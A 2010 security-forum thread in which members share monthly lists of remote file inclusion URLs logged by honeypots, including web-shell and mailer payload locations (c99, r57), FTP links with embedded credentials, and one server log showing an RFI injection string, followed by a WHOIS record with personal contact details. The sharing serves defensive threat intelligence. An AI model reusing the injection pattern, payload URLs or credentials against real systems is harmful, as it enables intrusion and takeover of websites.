Author Topic: RFIs  (Read 548431 times)

0 Members and 2 Guests are viewing this topic.

April 01, 2010, 09:26:32 am
Reply #675

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
RFIs March 2010
Code: [Select]
http://www.kamawilson.com/id1.jpg
ftp://relocs:102030@ftp.gratisweb.com/SenderMail.php
http://www.ultratone.com.my/new/idxx.pdf
http://www.novaera2009.kit.net/upar.txt
http://www.holod-guru.com/excel/Tests/templates/kontol.txt
http://saltoz.interfree.it/id1.txt
http://zerozon.co.kr/photos/count/columbus/cok1.txt
http://www.canadahost.ca/test.txt
http://www.temdetudoaquirc.com.br/contato/check.txt
http://blog.kakuro.com.tw/include/id1.txt
http://www.buddwriter.org/board/sc1
http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt
http://www.anydiy.net/diy/img/sc1
ftp://osmtec.t5.com.br:osm679@osmtec.t5.com.br/reser.php
ftp://jlginfo.com:as298.b2@jlginfo.com/images/reser.php
http://www.eliashadjeus.de/buch/smilies/teste.txt
http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt
http://canaldoserralheiro.com.br/laknat/cc1.txt
http://www.lpm.mgroup.pl/modules/xoopsgallery/id
http://www.import-et-export.fr//components/com_virtuemart/id1.txt
http://www.passificadormirc.xpg.com.br/cmdroot.txt
http://www.aabbcomunidade.org.br/test.txt
http://www.kneipp-kindergarten-badbocklet.de/alt/inArbeit/_derived/_vti_cnf/_vti_cnf/teste.txt
http://mycomputerdaddy.com/momma/id1.txt
ftp://myphptools:311205@ftp.webcindario.com/box.php
http://voiptechnocrats.com/command/id1.txt
http://www.sun-angel.ru//js/id1.txt
http://art-investments.eu/i
http://ghost2010.cwahi.net/Natal/2010/voxcards/inb.txt
http://antigua.granada.notariado.org//includes/id1.txt
http://snia2009.com/components/com_jce/zfxid1.txt
http://www.noin9191.com/ams/ammember/fx29id1.txt
ftp://relocs:102030@ftp.xpg.com.br/SenderMail.php
ftp://jomaradvocacia.com.br:101268@jomaradvocacia.com.br/tema.php
http://gesprachen.wewillhostit.com/id.txt
http://www.sitealacarte.be/cache/errors.txt
http://sumanenter.com/id1
http://www.hyonsvc.co.kr//bbs//icon/id1.txt
http://www.labottevini.com/site/idfx1.txt
http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body
http://newconsultoria.cwahi.net/Consultoria/cotacao/go.txt
http://snusoft.ru//administrator/components/com_remository/id.txt
http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt
http://novosarquivos.com.br/search.txt
http://www.quefrenhotel.com.br/scort.txt
http://www.lebouffay-spagnol.fr//components/com_banners/models/1.txt
http://www.sinaelee.com/lib/1.txt
http://www.import-et-export.fr//components/com_virtuemart/id2.txt
http://www.bmx20.com/gmail.txt
http://zvv6.interfree.it/echos.txt
http://car.sorabol.ac.kr/xe/files/.files/id1
http://auctionsworldwide.net//gsales///uploaded/catimgs/id1.txt
http://lei.crt-limousin.fr/ortl/forum/Dir/id1.txt
http://liceocarmelasilvadonoso.com/foto.gif
ftp://66.211.30.3/newsite/img/hot.txt
ftp://66.209.90.156/_notes/woooooow.txt
http://www.ursula1.de/fdh/fx29id.txt
http://zbajj.gov.cn/autobox.txt
ftp://ownedz.hd1.com.br:hahaha@ftp.hd1.com.br/pbot3.txt
http://www.cams.co.id/v6/logs/byz9991.txt
http://www.laborpascoperu.org.pe/envio11.txt
ftp://66.196.254.130/CLV/hot.txt
http://www.vmtubes.com.cn/footer
http://www.gogos.kr/bbs/id1.txt
http://www.hackclub.com.ar/tools/id1.txt
http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(pirates).txt
http://www.anarchyteam.org/oi.txt
http://www.sapotillebijoux.com//components/com_poll/views/poll/tmpl/id
http://www.villantomagazin.com//1.txt
http://www.gforhair.com/templates/beez/envio.txt
http://empresamar.dominiotemporario.com/nice.txt
http://www.xell2010.xpg.com.br/cmd.txt
http://www.byk23cc.xpg.com.br/c99.htm
http://www.byk23cc.xpg.com.br/tool25.htm
http://www.snep.edu.pl//modules/Top/COPYME.TXT
http://arsip.rembangkab.go.id/modules/head
http://sample3.itprogram.co.kr//upload/product/id1.txt
http://www.label-lehle.de/components/com_login/id
http://kucing1.fileave.com/id1.txt
http://www.karavi.net/components/com_banners/banner.txt
http://www.dogcafe.co.kr/sc1
http://www.djwest.org/board/data/bogel/id1.txt
http://slowlapt.awardspace.us/sstop.txt
http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt
http://boats.uksi.ru///includes/domit/id1.txt
http://fcg.com.pl/www/system2/tmp/id1.txt
http://www.mendipcastors.co.uk/templates////id1.txt
http://by-firmware-system.50webs.com/ttol/tool25.dat
http://goldenhelmets.fr/zip/test.txt
http://www.stomatformula.com.ua/help/sh/id1.txt
http://www.web-centre.ru/7c997b7392af6eef3812298e606d89e91016d7ad/id1.txt
http://12-volts-batteries.com/cmdz.gif
http://servededicado.com.br/power.txt
http://kucing3.fileave.com/id1.txt
http://dating-partner.com/forum/.tmp/x/fx29id.txt
http://www.skypeeupilokos.tecnologia.ws/inbox3.txt
http://www.jeffersonflausino.com.br/propaganda/cmd.html
http://www.enviolouco.xpg.com.br/up.txt
http://rdoug.sytes.net/on.txt
http://servededicado.com.br/power.txt
http://grupoup.com.br/banner/co.doc
ftp://189.19.36.105/temp/pz.txt
http://www.miranda.gov.ve/modules/mod_sections/id1.txt
ftp://vamo@akininguemtaska.info:vem999@akininguemtaska.info/yenor.php
http://www.freewebtown.com/host2010/temp.txt
http://miinet.com.ar/gbssi/fx29id1.txt
http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt
http://crot99.webs.com/moncrot1.gif
http://201.199.194.8/conta/id.txt
http://returz.interfree.it/id1.txt
http://www.foodntop.com/bbs/data/notice_1/robot.txt
ftp://viplas.com.br:ozzy666@viplas.com.br/reser.php
http://www.xell2010.xpg.com.br/tool25.doc
http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif
http://www.httpeds.xpg.com.br/teste.txt
http://www.reducom-dz.com//components/com_artforms/assets/captcha/includes/captchatalk/test.txt
http://www.americinn.com//email-images/images/test.txt
http://bajuszbt.hu/language/byz9991.txt
http://wkmg.co.kr/bbs/lib/1.txt
http://www.freewebtown.com/host2010/temp.txt
http://www.httpeds2.xpg.com.br/teste.txt
http://kliklan.com/images/nongkrong/scan/ID1.txt
ftp://toniiii:lucas123@ftp.xpg.com.br/jm.php
http://empcl.org/skin/member/id1.txt
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

April 20, 2010, 01:49:32 pm
Reply #676

Kimberly

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 13
Hello,

If this post needs to be moved, feel free to do so.

From my server logs:

164.115.5.63 is not listed for attacks on project honey pot, heaps of Google hits already searching on both IP and String used.

Code: [Select]
Host: 164.115.5.63 
 //weblinks.php///?_SERVER[DOCUMENT_ROOT]=http://www.nationalmedecine.com/forum/id1.txt?????
 Http Code: 200 Date: Apr 20 05:57:02 Http Version: HTTP/1.0 Size in Bytes: 428
 Referer: -
 Agent: Mozilla/5.0

Code: [Select]
Details on IP address 164.115.5.63
OrgName:    Asia Pacific Network Information Centre
OrgID:      APNIC
Address:    PO Box 2131
City:       Milton
StateProv:  QLD
PostalCode: 4064
Country:    AU

ReferralServer: whois://whois.apnic.net

NetRange:   164.115.0.0 - 164.115.255.255
CIDR:       164.115.0.0/16
NetName:    APNIC-ERX-164-115-0-0
NetHandle:  NET-164-115-0-0-1
Parent:     NET-164-0-0-0-0
NetType:    Early Registrations, Transferred to APNIC
Comment:    This IP address range is not registered in the ARIN database.
Comment:    This range was transferred to the APNIC Whois Database as
Comment:    part of the ERX (Early Registration Transfer) project.
Comment:    For details, refer to the APNIC Whois Database via
Comment:    WHOIS.APNIC.NET or http://wq.apnic.net/apnic-bin/whois.pl
Comment:   
Comment:    ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment:    for the Asia Pacific region.  APNIC does not operate networks
Comment:    using this IP address range and is not able to investigate
Comment:    spam or abuse reports relating to these addresses.  For more
Comment:    help, refer to http://www.apnic.net/apnic-info/whois_search2/abuse-and-spamming
RegDate:    2003-07-23
Updated:    2009-10-08

OrgTechHandle: AWC12-ARIN
OrgTechName:   APNIC Whois Contact
OrgTechPhone:  +61 7 3858 3188
OrgTechEmail:  search-apnic-not-arin@apnic.net

# ARIN WHOIS database, last updated 2010-04-19 20:00
# Enter ? for additional hints on searching ARIN's WHOIS database.
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at https://www.arin.net/whois_tou.html


Found a referral to whois.apnic.net.

% [whois.apnic.net node-3]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

inetnum:      164.115.0.0 - 164.115.255.255
netname:      THAISARN
descr:        imported inetnum object for NECTC
country:      TH
admin-c:      PP138-AP
tech-c:       PP138-AP
status:       ALLOCATED PORTABLE
remarks:      ----------
remarks:      imported from ARIN object:
remarks:
remarks:      inetnum:     164.115.0.0 - 164.115.255.255
remarks:      netname:     THAISARN
remarks:      org-id:      NECTC
remarks:      status:      assignment
remarks:      rev-srv:     NS1.NECTEC.OR.TH
                           NS.THNIC.NET
remarks:      tech-c:      PP78-ARIN
remarks:      reg-date:    1993-03-01
remarks:      changed:     hostmaster@arin.net 19971202
remarks:      source:      ARIN
remarks:
remarks:      ----------
notify:       passakon@nectec.or.th
mnt-by:       APNIC-HM
changed:      hostmaster@arin.net 19971202
changed:      hm-changed@apnic.net 20040926
changed:      hm-changed@apnic.net 20030627
changed:      hm-changed@apnic.net 20041214
source:       APNIC

person:       Passakon Prathombutr
address:      NECTEC
              RAMA VI ROAD,
              RAJTHEVI BANGKOK,
              THAILAND 10400
country:      TH
phone:        +662 248-8077
e-mail:       passakon@nectec.or.th
nic-hdl:      PP138-AP
remarks:      ----------
remarks:      imported from ARIN object:
remarks:
remarks:      poc-handle:  PP78-ARIN
remarks:      is-role:     N
remarks:      last-name:   Prathombutr
remarks:      first-name:  Passakon
remarks:      street:      NECTEC
                           RAMA VI ROAD,
                           RAJTHEVI BANGKOK,
                           THAILAND 10400
remarks:      city:        Bangkok
remarks:      country:     TH
remarks:      mailbox:     passakon@nectec.or.th
remarks:      bus-phone:   662 248-8077
remarks:      reg-date:    1994-09-21
remarks:      changed:     hostmaster@arin.poc 19950114
remarks:      source:      ARIN
remarks:
remarks:      ----------
notify:       passakon@nectec.or.th
mnt-by:       MNT-NECTECH-TH
changed:      hostmaster@arin.poc 19950114
changed:      hm-changed@apnic.net 20030627
source:       APNIC

April 20, 2010, 01:58:32 pm
Reply #677

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335

If this post needs to be moved, feel free to do so.


Fits perfectly.
Ruining the bad guy's day

April 30, 2010, 08:07:43 am
Reply #678

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
RFIs01-40 April 2010
Code: [Select]

http://www.comseguranca.org/ser/hot.txt
http://www.emir.dp.ua/e-mir/data/cmd.txt
http://www.mountaineermoney.com//administrator/components/com_menumanager/img00.txt
http://alandar.net/www2/log1.txt
http://www.hantechsys.com/board/a/id1
http://wdiet.co.kr/include/openview/scan/id1.txt
http://www.ukrmission.kr/images/22.txt
http://www.xell2010.xpg.com.br/tool25.txt
http://firmware2010.freehostia.com/kbcao.txt
http://vigario00.awardspace.biz/g.txt
http://saldiri.org/r57.txt
http://200.199.242.22/images/.ajim/ajim1.txt
http://hd-win.com/articles/ssh/sc1
http://sql6.com.br/sc/id1.txt
http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt
http://blondinkaksu.com//imgs/baner.txt
http://88hanyu.net/templates/beez/tool20.dat
http://www.pro-veillance.fr/components/com_virtuemart/F1.txt
http://www.corretoresdeseguros.com.br/estatisticas/id1
http://nic.bupt.edu.cn/media/j1.txt
http://www.backto.co.kr/data/faq/respon1.txt
http://www.utec.kr/service/kin/img/id1.txt
http://www.howtolisten.kr//parti/data/admin/id1.txt
http://info-sec.vec.go.th/Mail.txt
http://www.anarchyteam.org/oi.txt
http://ilmn.interfree.it/FxID1.txt
http://imsolution.co.th/images/menu/id1.txt
http://novoacessonet.com/co.doc
http://www.kyosan.com.tw/appserv/id1
http://segaero.or.kr/ver2/data/file/extra/id1.txt
http://www.iching-science.com/zbxe.1.0.2/id1.txt
http://armillum.com/tienda/qboard/id1.txt
http://stul.netsolutions.cz/img/.emergency/id1.txt
http://muzykologia.lublin.pl/templates/system/id1.txt
ftp://geracaodahora.org.br:malinche@geracaodahora.org.br/.../a.php
http://jungang.ca//youth2/fx29id.txt
http://dossierpolitico.com//galeria/panistasexpoforum45.jpg
http://imaginative-kidz.com/images/CheseFullInfoUpdated/inbox.txt
http://www.sinaelee.com/chianciano/chianciano18.jpg
http://www.danzateatro.net/id1
http://phamsight.com/docs/images/head
http://freecopts.net/arabic//id1.txt
http://www.4createwebsite.com/portal/rebots.txt
http://www.gigacenter.cl//tmp/auto1.txt
http://cvbn.interfree.it/FxID1.txt
http://lemoland.ru/forum/images/id1.txt
http://www.cibercuentos.org/baner.txt
http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk
http://e-regis.cmtc.ac.th/cvs/id1.txt
http://www.palmshop.cz//images/bovb.txt
http://www.kumcalb.org//g4/bbs/img/ld1.txt
http://www.gammarus.ru/prog/pl_menu/upx.txt
ftp://geracaodahora.org.br:malinche@geracaodahora.org.br/images/a.php
http://www.tempoeletronicos.com.br/mailling/comand.txt
http://www.datwani.ae/tools/inbox.txt
http://www.nationalmedecine.com/forum/id1.txt
ftp://securypost_zymichost:ce12f1aw@securypost.zymichost.com/TestMail.php
http://195.56.65.42/Arm/public_html/cteste.txt
http://www.abi.co.uk/id1.txt
http://freecopts.net/arabic//zfxid.txt
http://www.colegionarval.org/c99.txt
http://craftique.org/image/id1.txt
http://eng.argosound.co.kr/data/tmp/id1.txt
http://www.luomoeillegno.com/extras/idxx.txt
http://jkidx.sakura.ne.jp/up/up10/data/up0052.txt
http://kucing11.fileave.com/id1.txt
http://www.syrianobles.com/website/cv/zfxid1.txt
http://yuliana.zoomshare.com/files/2.txt
http://css.postech.ac.kr//bbs/skin/melygallery/id1.gif
http://messenger.justfree.com/cmd.txt
ftp://dogs:swamp2823@goswampdogs.com/teste.php
http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg
http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt
http://sogra.ru/idxx.txt
http://manat.pl/plugins/system/cmd.html
http://patnasciencecollege.org.in/css/inbox.txt
http://www.ntels.com/111//kcounter/stats/idomila.txt
http://takesi.freewebhostx.com//fx29id1.txt
http://silva.martinho.sites.uol.com.br/upar.txt
http://bdbd.interfree.it/FxID1.txt
http://pcdandf.com/bg/c.jpg
http://womancamp.co.kr/img/zero1.jpg
ftp://securypos:mbaw21@securypos.50webs.com/securypost.50webs.com/TestMail.php
http://www.howtolisten.kr/sarangbi_bgm/respon1.txt
http://www.r120.com/shop/images/about/r57.txt
http://www.wdiet.co.kr/include/openview/sc1
http://pyongwha.org/zeroboard/data/idxx.pdf
http://www.visitbrooklyn.org//images/home/_notes/id2.txt
http://cardsdenatal.com/cmd.doc
http://soninhavaivai.awardspace.us/TESTADOR.txt
http://sportsulsan.co.kr/poll/aipi/id.txt
http://www.miranda.gov.ve/modules/mod_sections/tmpl/main
http://www.freewebtown.com/maneiro/g.txt
http://www.ansanseo.es.kr/bbs/id1.txt
http://www.4site.net.au/1.jpg
http://www.tsi.su.lt/~donatas/ezContents/modules/calendar/ckrid1.txt
http://phamsight.com/bawok
http://dive2world.com/newdive/1.txt
http://danangportvn.com:32000//Ckrid1.txt
http://www.vistakstur.is/images/x.txt
http://come.kr/calendar315/plan/zfxid1.txt
http://ariko-security.com/robots.txt
ftp://geracaodahora.org.br:malinche@geracaodahora.org.br/images/teste.php
http://ubagroupofafrica.co.cc/sc/sc.txt
http://www.rittsound.com//modules/copyme.txt
http://www.thaianglican.org/song_doc/a.jpg
http://www.empcl.org/Scripts/bogel/id1.txt
http://mpress.com.ua///templates/zfxid1.txt
ftp://sportfitnessacademia.com.br:397646@sportfitnessacademia.com.br/reser.php
http://www.kchebandazza.com//modules/My_eGallery/gallery/qboard/id1.txt
http://vivago.fr/RD/a
http://evoluir-instituto.org.br/img/clientes/power.txt
ftp://server.pensecomigo.com.br/ftp/vai.txt
http://www.pointcominfo.com/phpBB2/id1.txt
http://www.cielecran.com//assets/images/rs1.jpg
http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif
http://www.guok.ru/netcat_files/boa/onlinebanking/secureupdate/checker/id1.txt
http://www.gratisweb.com/grezyboy/script.jpg
http://francophonie.utm.md/fx29id1.txt
http://77.92.94.85/id.txt
http://www.pokemonultra.xpg.com.br/lista/gmail.txt
http://www.intercaps.com/mv1.txt
http://www.brazilca.com/joomla//libraries/pear/test.txt
http://www.invictacom.com/images/cmdnova.txt
http://187.45.228.101/sprd2.gif
http://www.waterdistrict2.com/poll/.logs
http://www.guebau2.de/.logs
http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt
http://bboards.co.nz////data/file//music_skin/id1.txt
http://emeron.tjro.jus.br/up.txt
http://www.tempoeletronicos.com.br/mailling/spreadnew.txt
ftp://187.45.225.192/www/box-hot.txt
http://187.45.225.192/sprd2.gif
http://td-uralsnab.ru/images/id1.txt
http://telleriasnunez.com/id1.txt
http://healthshop.mhcasia.com//administrator/id1.txt
http://www.firmware.50webs.com/opa.txt
http://www.bdkorea.org/zeroboard/data/bangla01/gh1.txt
http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt
http://www.thebanquet.net/teste.txt
http://n1ngas.hdfree.com.br/fx29id.txt
http://www.lossts.xpg.com.br/tester.txt
http://www.gforhair.com/templates/beez/id.txt
http://xoomer.virgilio.it/webpages2009/lex_lutt0r_teste.txt
http://zerg.helllabs.net/cgi-bin/textenv.pl
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

June 01, 2010, 12:14:59 pm
Reply #679

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
RFIs May 2010
Code: [Select]
http://gonapus.net/chat2/user/xeika/1
http://incesp.com/uranus/id1.txt
http://www.ekin0x.com/c99.txt
ftp://svr0015:bdw002gr@svr001.com/public_html/TestMail.php
http://www.farmacialidercba.com.ar/admin/webalizer/1.txt
http://orelhas.pt/images/stories/id1
http://www.vinicolafin.com.br/loja/cmd.doc
http://www.howtolisten.kr//parti/data/admin/id1.txt
http://www.cevup.com/images/bogel/id1.txt
http://www.icts.it//components/com_virtuemart//themes/default/id1.txt
http://www.turfclub.ie/content/images/banners/shop.gif
http://195.56.65.42/Arm/public_html/cteste.txt
http://www.thezi.org//media/dex/id1.txt
http://premierwww.com/media/id2.txt
http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt
http://67.225.223.229/cmd.doc
http://www.sly8.com/sly8//bbs/id1.txt
http://nic.bupt.edu.cn/media/id1.txt
http://www.jeans-center.ddl2.pl/images/test.txt
http://www.mediavedi.nl/video/up.txt
http://www.leolagrangegym.com/yy1.txt
http://www.fileden.com/files/2010/3/26/2805620//c7.txt
http://kroniske-syge.dk/cache/id1.txt
http://www.novotempo1.xpg.com.br/up.txt
http://smash4.fileave.com/zfxid1.txt
http://www.avion-rc.com/components/com_user/models/readme.txt
http://www.scungiolamieristaerestauratore.it/SpryAssets/inbox.txt
http://187.54.97.60:8080/mailer/box-terra.txt
http://www.hyfit.com.cn/blog/cmd.txt
http://alaindaloz.fr//baner.txt
http://42art.com/bbs/skin/ggambo_bogal/id1.txt
ftp://rox2010:asdf1234@ftp.drivehq.com/wwwhome/teste.php
http://www.dislessiainrete.org/id1.txt
ftp://187.45.225.87/ftp/vai.txt
http://www.cricermenate.it/idxx.txt
ftp://vamo@akininguemtaska.info:n1k2p3@akininguemtaska.info/lolinho.php
http://compas.ru//poll/polldata/idomila.txt
http://wanso.ssu.ac.kr/zboard/admin/1.gif
http://www.elhdolympus.com/toga/idxx.pdf
http://www.dvhrunners.co.kr//bbs//data/id1.txt
http://mpva.com.au/x
ftp://primeirosegundo:ps2010@ftp.primeirosegundo.com/www/c.php
http://www.nordseepflege.de/module/g.txt
http://tribunalsuperiorsetor04.webng.com/enviar.php.txt
http://213.252.116.180:81/roundcubemail/bin/1.gif
http://www.oakhillbaptist.com////logs/id1.txt
http://superleilao.siteoficial.ws/o0/g.txt
http://www.tributetohallyday.fr//components/com_artforms/assets/captcha/includes/captchaform/test.txt
http://mastersurpreenda0.t35.com/cmdscan.txt
http://www.freewebtown.com/celular2010/bing.txt
http://www.sharon.or.kr/data/id1.txt
http://into.or.kr/usr/ebook_upload/id1.txt
http://forum.c4evn.org/id1.txt
http://173.193.200.34/on.txt
http://www.escoladearteaeb.com.br/cmd.doc
http://www.falaki2010.xpg.com.br/off.txt
http://www.freewebtown.com/mustafar/g.txt
http://futebolimaginario.com.br/css/allan.txt
http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg
http://jmbioanalises.com.br/Rotaract/Caixa/cache/g.txt
http://nic.bupt.edu.cn/media/j1.txt
http://www.cttimes.co.kr//bbs/data/fta/sc1
http://halupa.org.ua//plugins/sh/auto1.txt
http://our.anet.com//modules/1.gif
http://www.confirmacompleto.com/teste.txt
http://orcamentos.freewebhostx.com/vull_teste.txt
http://www.fuerzarh.com/1.txt
http://www.shanghai.co.kr/board/P1.txt
ftp://psicologosassociados.com.br/index_arquivos/c.php
http://www.falaki2010.xpg.com.br/temp/opa.txt
http://www.psend.com/users/jhonnys/tool25.txt
http://bellschool.net/libraries/phpmailer/id1.txt
http://www.fwinc.jp/daria/research/fx29id1.txt
http://www.midlothiancamera.org/id.txt
http://www.paneru.com/gyfc/a4m4nty.txt
http://www.tool2010.xpg.com.br/ttol/tool25.txt
ftp://p2010:senha01@p2010.hostse.com/test.php
http://www.jinyoung-tsm.com/rgboard/data/idomila.txt
ftp://xth_5709828:senha01@ftp.xtreemhost.com/htdocs/test.php
http://www.kangnung.org//zb//s1.txt
http://www.howtolisten.kr/lct/exam3/81/auto1.txt
http://highcountryharley.yourbusinessedge.biz/two
http://www.spread.xx/xx.xx
ftp://dwa55_zymichost:*password*@dwa55.zymichost.com/TestMail.php
http://floridaexclusiveinteriors.com/on.txt
http://bellschool.net/libraries/phpmailer/dian/idjh1.txt
ftp://xth_5709828:senha01@ftp.xtreemhost.com/htdocs/teste.php
http://240plan.ovh.net/~falcoisi/site/_SiteFalcoRO/yy.txt
http://w7bmil.sites.uol.com.br/mail.html
http://visa2010.justfree.com/pop.txt
http://jmbioanalises.com.br/Lims/images/g.txt
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

July 01, 2010, 08:17:07 am
Reply #680

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
RFIs June 2010
Code: [Select]
http://bellschool.net/libraries/phpmailer/dian/idjh1.txt
http://vull2010.xp3.biz/c99.txt
http://falaki2010.hd1.com.br/c99.txt
http://demo66.zxq.net/indexx.txt
http://199.80.55.18/go.php
http://turismolugares.com.br/on.txt
http://www.fwinc.jp/daria/research/tool25.dat
http://www.freewebtown.com/fucku15/cmd.txt
http://tehstroj.com/modules/mod_poll/ts
http://www.sdit-alfirdaus.sch.id/components/com_sef/1.txt
http://163.20.166.223:8080/1.txt
http://bichamuda.zxq.net/index.txt
http://syszone.co.kr/bbs/icon/private_name/image1.jpg
http://silvia-pink19.smtp.ru/c99.txt
http://www.fwinc.jp/daria/research/id.txt
http://www.howtolisten.kr/lct/exam3/81/auto1.txt
http://www.k23ccsite2010.xpg.com.br/cmd.txt
http://www.mbbygg.no/money.txt
http://www.megatechintl.com.pk/money.txt
http://wklej.org/id/295897/txt/
http://www.askoracle.net/casper/casper.txt
http://www.singaporemathtraining.com/casper/casper.txt
http://promotionkorea.co.kr/zboard/data/teeste.pdf
http://brd666.no-ip.org:8080/sprd.gif
http://www.foroptimalhealth.com/modules/dtree/id1.txt
http://www.ysymca.or.kr/bbs/icon/fx1.txt
http://www.whitesandstours.com/1.jpg
http://brd666.no-ip.org:8080/btnt.gif
http://www.navegantis.com/enviabde.txt
http://wagnersnet.com/components/com_extplorer/sc1
http://195.56.65.42/GDT/test.txt
http://www.httpeds6.xpg.com.br/teste.txt
http://www.k23cc2010.xpg.com.br/cmdxk9/c99.txt
http://eyesoftheworld.com.au/components/com_virtuemart/fx1.txt
http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt
http://rosasbakeware.com/brandon/pb.gif
http://cayguvenlik.com/form/tool20.dat
http://www.poker-academie.com/eloi/db.txt
http://suzuka.fileave.com/zfxid1.txt
http://www.kart-thiais.com/forum/id.txt
http://hosanmt.net/bbs/data/freeboard/open.txt
http://kangnung.org/zb/casper/Ckrid1.txt
ftp://magao@w3fbrazil.com:senhapadrao@w3fbrazil.com/index4.php
http://www.solidarregion.at/id.txt
http://aca.ro.lt/id5.txt
http://sites.google.com/site/nurhayatisatu/1.txt
http://inmobiliariapymsa.com/cache/test.gif
http://talesetc.co.uk/templates/system/images/555.txt
http://www.transkonsult.com.ar/test.pdf
http://www.ahgoobaby.com/1.jpg
http://www.aseta.es/Eng/creat.php/defaut.php
http://samroseelectronics.com/pb.gif
ftp://baixe-admin:fgicad0ssn@ftp.baixe-aqui.info/httpdocs/test.php
http://hdjshye.110mb.com/1.txt
http://www.miskalehtivuori.com//tool.txt
http://www.miskalehtivuori.com//home.list.php
http://www.sinhhocvietnam.com/data/1
http://www.carpinchonet.com.ar/estilos/index.txt
http://nephis-airlines.com/Logos/b.txt
http://www.windmatik.com/grafika/iimbox.txt
http://aiseepms.fr/old/blue.txt
http://www.juwelier-hanguel.de//admin/includes/sh/1.png
http://djwenterprizes.com/mozhet/1.pdf
http://www.fileden.com/files/2009/12/6/2678774//abc.txt
ftp://obchvatfm.cz:ddwuvl8@balto.kraja.cz/www/include.jpg.php
http://h1.ripway.com/sucupira/enviar.php.txt
http://97.74.238.165/images/stories/lanmutitou/z1.jpg
http://www.totsmartcall.com/a.txt
http://refacing.biz/_/id1.txt
http://www.testedoxroot5.t35.com/upload.txt
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

August 01, 2010, 09:56:24 am
Reply #681

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
RFIs July 2010
Code: [Select]
http://ogario.com/booking/sprd-cmd.gif
http://www.dukhi.co.uk/includes/PEAR/id
http://www.dong69.co.kr/xe/1.pdf
http://feltonelectriccorp.com/gallery/Solon/index.txt
http://hirlevel.uw.hu/Ckrid1.txt
http://ratiobond.de/1.txt
http://www.tourgaja.net/www/data/casper/Ckrid1.txt
http://www.k23cc01.xpg.com.br/cmd.txt
http://www.mysandhaanu.com//scripts/id.txt
ftp://baixe-admin:fgicad0ssn@ftp.baixe-aqui.info/httpdocs/up.php
http://www.porto.napoli.it/tt/data/p1.txt
http://www.kortech.cn//bbs/id1.txt
http://www.yangsheng.ru/board/fx29id.txt
http://loja.astrofoto.com.pt/mambots/system/zfxid1.txt
http://cdoug.sytes.net/on.txt
http://www.unixsend.xpg.com.br/cmd.txt
http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt
http://www.unixsend.xpg.com.br/send.txt
http://www.astralpool.hu/pic/koprtur.txt
ftp://host8:123456789@ftp.host8.org/www/tools/index7.php
http://www.mello2010.xpg.com.br/on.txt
http://polotele.fileave.com/scanrfi.txt
http://polotele.fileave.com/polotele-1.txt
http://polotele.fileave.com/sql.txt
http://www.namima.info/Admin/casper/Ckrid1.txt
http://www.tcphotography.me.uk/dreaming/1
http://www.unixsend.xpg.com.br/command.txt
http://www.unixsend.xpg.com.br/test.txt
http://www.kliknetezde.cz/ttol/tool25.dat
http://mall.yjecrc.or.kr//bbs/Template/Mobile/Ckrid1.txt
http://www.logina.biz/kioski/pictures/cmd/sstop.dat
http://www.fileden.com/files/2010/5/25/2870332//Ipbot.txt
http://www.prigorje-info.com/includes/teeste.pdf
http://www.tool2010.xpg.com.br/tool25.txt
http://www.irishtoothache.com/ver1
http://progene.info/English/Fx29ID.txt
http://feltonelectriccorp.com/gallery/Solon/teste1.txt
http://www.clickjujuy.com.ar/images/archivos/auto/test
http://tjdhosp.co.kr/data/session/byz9991.txt
http://ceteleim.com/id.txt
http://199.80.55.80/go.php
http://www.postmytrips.com//flashservices/services/id1.txt
http://www.acsek.hu/styles/sstop.dat
ftp://constru03:mClRzpgi@ftp.constru03.web43.f1.k8.com.br/www/testa.php
http://helhetreklam.se/id
http://www.stv1777.ru/ib2k1.dll/cmd.txt
http://www.toptrade.cz/bazar/scort.txt
http://sites.google.com/site/nurhayatisatu/1.txt
http://castellovecchio.net/cbhew/dziyon.php
http://unixserver.t35.com/cmd.txt
http://rchateap.com/g.txt
http://www.howtolisten.kr/lct/exam3/81/auto1.txt
ftp://floppy1:RpgYye1e@ftp.floppy1.web43.f1.k8.com.br/test.php
http://upload.freedom-vrn.ru/upload/tool25.txt
http://www.howtolisten.kr/lct/exam3/81/auto1.txt
http://h1.ripway.com/moduloenviar/enviar_php.php
http://www.net-games.it/open.txt
http://www.kliknetezde.cz/cmd.dat
http://www.labo-rat-oire.fr//components/com_artforms/assets/captcha/includes/captchatalk/test.txt
http://seiva.tur.br/imagens/idx
http://15446522.t35.com/cmd.dat
http://www.lockcenter.com.ar/tool25.dat
http://216.245.205.74/judge.php
http://www.tiktak.cc/tmp/id1.txt
http://redigo.gonet.it/modules/geo/BancodoBrasil/c99.txt
